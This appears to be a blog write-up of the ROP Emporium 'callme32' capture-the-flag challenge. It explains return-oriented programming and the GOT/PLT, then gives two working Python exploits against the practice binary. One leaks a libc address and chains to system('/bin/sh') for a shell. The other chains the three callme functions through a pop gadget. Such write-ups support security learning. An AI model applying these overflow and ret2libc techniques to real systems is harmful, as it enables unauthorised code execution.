Callme32 Binary Challenge Two Solutions - ROP Emporium

Hello Guys,



Welcome Again, Today  I am going To share my Solution Of Callme32 Binary Solutions.
Before Sharing My Solution, Let's Take A Basic Look Over Few Related Concepts.


What is Binary Exploitation?
Ans. According To Google Search,
                                                       "Binary exploitation is the process of subverting a compiled application such that it violates some trust boundary in a way that is advantageous to you, the attacker. In this module we are going to focus on memory corruption."



What is ROP?
Ans. According To Wikipedia
                                               "Return-oriented programming (ROP) is a computer security exploit technique that allows an attacker to execute code in the presence of security defenses such as executable space protection and code signing.

In this technique, an attacker gains control of the call stack to hijack program control flow and then executes carefully chosen machine instruction sequences that are already present in the machine's memory, called "gadgets".[2] Each gadget typically ends in a return instruction and is located in a subroutine within the existing program and/or shared library code. Chained together, these gadgets allow an attacker to perform arbitrary operations on a machine employing defenses that thwart simpler attacks." Check Here


What is GOT and PLT?
Ans. According To Systemoverload
                                                          "There’s two types of binaries on any system: statically linked and dynamically linked. Statically linked binaries are self-contained, containing all of the code necessary for them to run within the single file, and do not depend on any external libraries. Dynamically linked binaries (which are the default when you run gcc and most other compilers) do not include a lot of functions, but rely on system libraries to provide a portion of the functionality. For example, when your binary uses printf to print some data, the actual implementation of printf is part of the system C library. Typically, on current GNU/Linux systems, this is provided by libc.so.6, which is the name of the current GNU Libc library.
In order to locate these functions, your program needs to know the address of printf to call it. While this could be written into the raw binary at compile time, there’s some problems with that strategy:
Each time the library changes, the addresses of the functions within the library change, when libc is upgraded, you’d need to rebuild every binary on your system. While this might appeal to Gentoo users, the rest of us would find it an upgrade challenge to replace every binary every time libc received an update.
Modern systems using ASLR load libraries at different locations on each program invocation. Hardcoding addresses would render this impossible.
Consequently, a strategy was developed to allow looking up all of these addresses when the program was run and providing a mechanism to call these functions from libraries. This is known as relocation, and the hard work of doing this at runtime is performed by the linker, aka ld-linux.so. (Note that every dynamically linked program will be linked against the linker, this is actually set in a special ELF section called .interp.) The linker is actually run before any code from your program or libc, but this is completely abstracted from the user by the Linux kernel. 

Relocations

                        Looking at an ELF file, you will discover that it has a number of sections, and it turns out that relocations require several of these sections. I’ll start by defining the sections, then discuss how they’re used in practice.

.got
            This is the GOT, or Global Offset Table. This is the actual table of offsets as filled in by the linker for external symbols.

.plt
           This is the PLT, or Procedure Linkage Table. These are stubs that look up the addresses in the .got.plt section, and either jump to the right address, or trigger the code in the linker to look up the address. (If the address has not been filled in to .got.plt yet.)

.got.plt
           This is the GOT for the PLT. It contains the target addresses (after they have been looked up) or an address back in the .plt to trigger the lookup. Classically, this data was part of the .got section.

.plt.got
             It seems like they wanted every combination of PLT and GOT! This just seems to contain code to jump to the first entry of the .got. I’m not actually sure what uses this. (If you know, please reach out and let me know! In testing a couple of programs, this code is not hit, but maybe there’s some obscure case for this.)
" Check Here


What is GDB-Peda?
Ans. PEDA - Python Exploit Development Assistance for GDB. PEDA is a Python GDB script with many handy commands to help speed up exploit development process on Linux/Unix. It is also a framework for writing custom interactive Python GDB commands.



How To Setup GDP-Peda?

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

I Don't Want To Spoil Your Fun. That's Why Try With Hints Command. (Come On it's Not That Much Hard.)

# Hints Commands
#
# Open callme32 with GDB
gdb -q ./callme32
#
# Check out the functions in use
gdb-peda$ info functions
#
#
# Time To Take Help From, Metasploit Built-in Unique Pattern Generating Tool
`path/to/metasploit/tool pattern_create.rb` -l 500 > fuzzing_pattern.txt

#
# Run Quickly 
$ gdb -q ./callme32
Reading symbols from ./callme32...(no debugging symbols found)...done.
#
# To Redirect Inputs Through Pipe Concept
gdb-peda$ run < fuzzing_pattern.txt
#
# Find Padding
`path/to/metasploit/tool pattern_offset.rb` -q 0xaddress


#
# Install ROPgadget
pip install ropgadget

# Execute ROPgadget against callme32
ROPgadget --binary ./callme32 | grep "pop"


Solution 1


#!/usr/bin/python
from struct import pack, unpack
import pwn



#######################################################
#              Art Configuration
#######################################################

# Bold High Intensity
BIBlack='\033[1;90m'      # Black
BIRed='\033[1;91m'        # Red
BIGreen='\033[1;92m'      # Green
BIYellow='\033[1;93m'     # Yellow
BIBlue='\033[1;94m'       # Blue
BIPurple='\033[1;95m'     # Purple
BICyan='\033[1;96m'       # Cyan
BIWhite='\033[1;97m'      # White
# Reset
Color_Off='\033[0m'       # Text Reset

art = BIRed+'''
+ ------------------------------------------------------------------ +
= +----------------------------------------------------------------+ =
= |                                                                | =
= |     _____ ___________   _____                                  | =
= |    /  ___/  ___| ___ \ |  __ \                                 | =
= |    \ `--.\ `--.| |_/ / | |  \/_ __ ___  _   _ _ __             | =
= |     `--. \`--. \ ___ \ | | __| '__/ _ \| | | | '_ \            | =
= |    /\__/ /\__/ / |_/ / | |_\ \ | | (_) | |_| | |_) |           | =
= |    \____/\____/\____/   \____/_|  \___/ \__,_| .__/            | =
= |                                              | |               | =
= |                                              |_|               | =
= +----------------------------------------------------------------+ ='''+Color_Off+BIBlue+'''
= +----------------------------------------------------------------+ =
= |                                                                | =
= |                   surajsinghbisht054@gmail.com                 | =
= |                      www.bitforestinfo.com                     | =
= |                                                                | =
= |                  Try Smart, Try Hard & Don't Cheat             | =
= +----------------------------------------------------------------+ =
+ ------------------------------------------------------------------ +
'''+Color_Off
print art

# Get Shell payload
def getshell(libc, sh_offset, exit_offset, sys_offset):
 libc = libc
 binsh = libc+sh_offset
 exitf = libc + exit_offset
 sysf = libc+ sys_offset
 print '[*] Libc Address   : ', hex(libc)
 print '[*] Binsh Address  : ', hex(binsh)
 print '[*] Exit Address   : ', hex(exitf)
 print '[*] System Address : ', hex(sysf)
        arg =  0x80485d0
        pay = ''
        pay += '\xcc'*40 # Buff
        pay += 'BBBB'
        pay += pack('I', sysf ) # puts # EIP
        pay += pack('I', exitf ) # pwnme
        pay += pack('I', binsh)
 return pay


# Stage One payload
def payload():
 arg =  0x80485d0 # puts@plt
 pay = ''
 pay += '\xcc'*40 # Buff
 pay += 'BBBB'
 pay += pack('I', 0x80485d0 ) # puts # EIP
 pay += pack('I', 0x80487b6 ) # pwnme
 pay += pack('I', 0x804a01c)  # _GLOBAL_OFFSET_TABLE_
 return pay


# Exploit
pwn.context.log_level='debug'

p = pwn.process(raw_input('[+] Insert Path of Callme32 Binary : ')[:-1])
print p.recvuntil('>')
p.sendline(payload())
s=p.readline()
addr = unpack('I', s[1:5])[0]
print '[*] Leak Addr From 0x804a01c : ', hex(addr)
n = getshell(addr,0x11658f ,-227184, -174400)
print p.readline()
p.sendline(n)
pwn.context.log_level='critical'
p.interactive()


Solution 2



#!/usr/bin/python
from struct import pack

#+ ------------------------------------------------------------------ +
#= +----------------------------------------------------------------+ =
#= |                                                                | =
#= |     _____ ___________   _____                                  | =
#= |    /  ___/  ___| ___ \ |  __ \                                 | =
#= |    \ `--.\ `--.| |_/ / | |  \/_ __ ___  _   _ _ __             | =
#= |     `--. \`--. \ ___ \ | | __| '__/ _ \| | | | '_ \            | =
#= |    /\__/ /\__/ / |_/ / | |_\ \ | | (_) | |_| | |_) |           | =
#= |    \____/\____/\____/   \____/_|  \___/ \__,_| .__/            | =
#= |                                              | |               | =
#= |                                              |_|               | =
#= +----------------------------------------------------------------+ =
#= +----------------------------------------------------------------+ =
#= |                                                                | =
#= |                   surajsinghbisht054@gmail.com                 | =
#= |                      www.bitforestinfo.com                     | =
#= |                                                                | =
#= |                  Try Smart, Try Hard & Don't Cheat             | =
#= +----------------------------------------------------------------+ =
#+ ------------------------------------------------------------------ +


# =====================================================
#                Useful Functions Lists
# =====================================================
#
# 0x804881b <usefulFunction+15>: call   0x80485b0 <callme_three@plt>
# 0x804882c <usefulFunction+32>: call   0x8048620 <callme_two@plt>
# 0x804883d <usefulFunction+49>: call   0x80485c0 <callme_one@plt>
# 0x804884a <usefulFunction+62>: call   0x80485e0 <exit@plt>
#
# =====================================================
#               Useful Gadget
# ====================================================
# 0x080488a9 : pop esi ; pop edi ; pop ebp ; ret

# ======================================================================
#                               Crafting Payload
# ======================================================================






buf = ''
buf += pack('I', 0x80485c0) # CALLME ONE
buf += pack('I', 0x080488a9) # pop    esi pop    edi pop    ebp ret   
buf += pack('I', 1)
buf += pack('I', 2)
buf += pack('I', 3)
buf += pack('I', 0x8048620) # CALLME TWO
buf += pack('I', 0x080488a9)# pop    esi pop    edi pop    ebp ret 
buf += pack('I', 1)
buf += pack('I', 2)
buf += pack('I', 3)
buf += pack('I', 0x80485b0) # CALLME THREE
buf += pack('I', 0x080488a9)# pop    esi pop    edi pop    ebp ret 
buf += pack('I', 1)
buf += pack('I', 2)
buf += pack('I', 3)
buf += pack('I', 0x80485e0) # EXIT

# EDX = 0
# EDI = 0
pay = ''
pay += 'A'*40 # EAX, ECX Pointing To This Text
pay += 'EEEE' # EBP
pay += buf # EIP

print pay


I hope, you Guyz Enjoying It.


Share this

Related Posts

Previous
Next Post »